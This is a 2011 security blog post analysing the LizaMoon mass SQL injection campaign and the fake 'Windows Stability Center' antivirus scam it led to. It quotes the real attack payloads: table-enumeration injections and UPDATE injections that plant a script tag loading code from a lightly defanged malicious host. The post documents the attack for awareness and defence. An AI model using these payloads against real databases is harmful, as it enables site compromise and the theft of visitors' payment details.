Tuesday, April 5, 2011

SQL injection LizaMoon

I might be naïve but each time I analyze mass SQL injection incident I can’t stop thinking on the fact that this type of vulnerability is living with us for more than 10 years!
And yet again in the last few days we can see a lot of information on a new automated SQL injection attack called LizaMoon effecting over 1,500,000 pages all around the world. The interesting thing about this attack is that the attack scenario consists of several steps:

  • Automated mass SQL injection attack that tries to inject Javascript code (The Javascript source code is located on a remote application) to as many pages as possible in the application, using the following payloads:

SQL query that retrieves tables’ and fields names

11011+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+where+TABLE_NAME+not+in+(SELECT+TOP+0+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))--



SQL update query that injects Javascript to database

Id = 1’+ update + tb + set + Descripcion = REPLACE (cast (Descripcion + as + varchar (8000)), cast (char (60)% 2Bchar (47)% 2Bchar (116)% 2Bchar (105 ) .... </ title> <script src=httq:// lazemxxn .com / ur. php> </ script> ...% 2Bchar (116)% 2Bchar (62) + as + varchar (8000)), cast (char (32) + as + varchar (8 )))--


Id = 1 '+ update + tblMembers + set + Forename = REPLACE (cast (Forename + as + varchar ( 8000)), cast (char (60)% 2Bchar (47)% 2Bchar (116)% 2Bchar (105) .... </ title> <script src = httq: / / lazemxxn. com / ur. php> </ script> ...% 2Bchar (116)% 2Bchar (62) + as + varchar (8000)), cast (char (32) + as + varchar (8)) ) --


  • The injected Javascript redirect the user to malicious application which pretends to scan client computer for viruses and finds some bad malwares on his computer – of course, it is all just a big scam.
  • At this point, the user is being asked to download the (fake) anti-virus software named “Windows Stability Center”.
  • After running the (fake) anti-virus software, the program UI displays warning saying a lot of problems were discovered on the PC and the user is being asked to buy full version of the “Windows stability center” product, asking him to send his credentials, including credit card and CVV number.

As you can see it is a very sophisticated and complex attack _just_ to still users’ credit cards numbers.
Going back to the beginning of this post, since SQL injection was first introduced, application security was fortified by IDS/IPS, application security awareness (OWASP), security scanners, static code analysis and web application firewall, and still this attack is alive and kicking.

More information can be found in the following links below.
An interesting video presented by Websense:




Detailed attack scenario:

http://community.websense.com/blogs/securitylabs/archive/2011/03/31/update-on-lizamoon-mass-injection.aspx
Posted by at
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)